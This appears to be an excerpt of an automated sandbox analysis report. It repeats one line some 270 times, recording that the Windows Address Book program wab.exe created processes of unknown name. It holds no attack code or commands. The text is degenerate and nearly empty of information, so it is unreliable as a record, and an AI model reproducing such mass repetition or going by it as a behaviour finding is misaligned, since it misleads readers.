Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
